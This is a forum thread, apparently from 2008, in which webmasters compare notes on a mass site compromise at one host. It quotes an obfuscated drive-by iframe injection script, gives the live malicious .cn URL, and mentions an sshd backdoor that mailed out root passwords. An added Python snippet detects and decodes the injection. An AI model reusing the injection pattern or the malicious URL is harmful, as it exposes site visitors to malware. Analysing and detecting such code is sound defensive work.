I will be buying hosting from someone here in DP. So I had been visiting his site for 3 days. Everything was ok, but since yesterday night, when I tried to enter the site, it redirected me to http://hu1-hu1.cn/counter/getfile.php?f=vispdf (DON'T ENTER!). This site opened a PDF file, which Adobe Reader said isn't a valid PDF. I knew this was really suspicious (virus), so I googled the Chinese URL and found only one result (OF TODAY, OCTOBER 23!!): http://forums.permaculture.org.au/viewtopic.php?f=8&p=45188

This is interesting. Both forums.permaculture.org.au and the hosting site of that member of DP have the following code:

</body> </html> <html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = ""; for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1); document.write(result); </script> </html> </body>

Notice the syntax: </html> then <html> <body> and then </html> </body>. First: a valid HTML page only has one <html> tag and a respective closing one, </html>. This page closed with the tag </html> and then opened the html tag again. Second: the <body> tag must be closed before </html>; in this case, the </html> tag is before </body>. Also, the body tag was already closed before the injected script.

Another thing I noticed in the whois of hu1-hu1.cn is: 1. The IP is from Ukraine, with the same datacenter that the USB key trojan (the virus that exploits autorun.inf in flash drives and hides hidden folders) uses. 2. When I tried to visit the IP, K-9 Web Protection (installed on my PC) said: 3. The domain is from China, same country as the same USB key virus.

Beware, I use Kaspersky Internet Security and Firefox 3 and it's possible I've gotten a virus. I am scared. I will try to visit the site in Ubuntu and I will tell you what happens. Regards
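As an added example (not from the thread or any of its posters), here is a small Python checker an admin could run over a page to spot the self-decoding script described above: it finds the fromCharCode(... - N) loop, pulls the string it decodes, undoes the shift to reveal the hidden iframe, and separately flags content appended after the first </html>. The sample page is constructed from the snippet quoted in the post; the function names are my own.

```python
import re

# Constructed sample: the injected block quoted in the post, appended to a
# normal page. Example input only, not a copy of any real site.
SAMPLE_PAGE = """<html><body><p>hello</p></body></html>
<html>
<body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?";
var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result);
</script>
</html>
</body>
"""

# The decoding loop: String.fromCharCode(<var>.charCodeAt(<idx>) - <shift>)
SHIFT_LOOP_RE = re.compile(
    r"String\.fromCharCode\(\s*(\w+)\.charCodeAt\(\w+\)\s*-\s*(\d+)\s*\)")
IFRAME_SRC_RE = re.compile(r"<iframe[^>]*\bsrc\s*=\s*['\"]?([^'\" >]+)", re.I)


def find_injections(html):
    """Return one dict per shift-decoded script found, with the decoded payload."""
    findings = []
    for m in SHIFT_LOOP_RE.finditer(html):
        var, shift = m.group(1), int(m.group(2))
        # Locate the string literal assigned to the variable the loop decodes.
        src = re.search(r"var\s+%s\s*=\s*\"([^\"]*)\"" % re.escape(var), html)
        if not src:
            continue
        decoded = "".join(chr(ord(c) - shift) for c in src.group(1))
        iframe = IFRAME_SRC_RE.search(decoded)
        findings.append({
            "shift": shift,
            "decoded": decoded,
            "iframe_src": iframe.group(1) if iframe else None,
        })
    return findings


def trailing_after_html_close(html):
    """Anything after the first </html> other than whitespace is a red flag."""
    idx = html.lower().find("</html>")
    if idx == -1:
        return ""
    return html[idx + len("</html>"):].strip()


if __name__ == "__main__":
    for f in find_injections(SAMPLE_PAGE):
        print("shift=%d decoded=%s" % (f["shift"], f["decoded"]))
    print("after </html>:", trailing_after_html_close(SAMPLE_PAGE)[:40])
```

Running it on the sample prints the 1x1 iframe and its URL; on a clean page both functions return nothing.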
We got hit this morning too and I also found the permaculture site. Is the member you were talking about hosting with Layered Technologies? We have a co-located server with them and I noticed that permaculture is hosted with them. James Bullis Xeal.com
Yes. That member. I just won't say who it is because it would damage his reputation. Also, it is not his fault.
Hey Guys, I just wanted to give you an update on where I am at. Apparently this issue has been around for a few days now. I think it originated recently as going to prevedvsem123.cn. In the last few days the url changed a few times and we happened to catch the bug when it was going to hu1-hu1.cn. When I Googled prevedvsem123.cn I found a lot of other people being affected by this. Every one of them ties back to LT. I got a call from someone at LT and they are apparently aware of the situation. They informed me that PHP had been compromised and that sshd had been rewritten so that anytime I updated the root password it would notify an email address at @ymail. After looking back, I can see that this issue started affecting my server around the 10th and we just now received the injection. At this point, per the request of LT, and the agreement of our server consultants we are disconnecting the hard drives, and reloading the os. I figured there was something else we could have done, but based on the extent of the damage there is no telling what all has been changed. I am convinced this is a good idea since this is related to a very similar attack which occurred in September of 2007. Right now I am just waiting on the reloaded server to come back online and then I will be proceeding to clean the old data and porting it over. I wish I was a super server guy like you guys but this nub just got pwned....
First, check whether it is the traffic stats code. Second, I guess your site is a backup of ASP scripts; it is easy to get injected. Third, if it is a virus, try Kaspersky; it works well.
Here are your answers: 1. No, it's not a traffic stats code. A tracking code does not open a fake .PDF file. 2. I use Kaspersky (didn't you read the whole post?!) and today it told me it was a trojan called Trojan-Downloader.JS.Agent.cua, so yes, it is a virus. 3. The site is not mine. Oh, yes, it's written in HTML.
Oh my, I heard this problem has been discussed in other forums since two days ago... I was wondering, does it have any solutions for this problem?
OMG, I visited a site yesterday and there was this PDF file... stupidly, I downloaded it and Adobe says it's an illegal PDF. I'm using McAfee; any way to check if I have been infected by this virus? I am currently scanning my computer. Also, I am running Vista. Thanks
It's not only infecting the PC, but also web sites... and from websites to webmasters' PCs and web visitors. Really painful virus... Hope it's fixed; some servers are down because of these attacks.
I visited an infected site two days ago and Kaspersky didn't find anything. My PC got infected and I spent 2 days backing up files and formatting.
How do I know if I am infected? Visiting the site with Firefox didn't say anything, but with IE it detected the virus... so I don't know...
Does this affect Ubuntu? I'm using FF3... I mean, you told us in the first post you'd tell us what happens on Ubuntu. Nothing should happen... and much less if Wine is not installed. Am I wrong?
Wow! Thanks for the early warning. I was wondering if I'm infected, my sister is also using my laptop and my AVG won't update.
My safelist got hit by this... and all the safelists that were on my host's shared server got infected as well... I don't even think the other admins know yet, but I'm not sure I know all the sites that are on the server to warn them. It's been a big pain in the butt to find all the infected files. Does anyone know if this can only be injected into sites with </html> in the code? And only PHP and HTML files?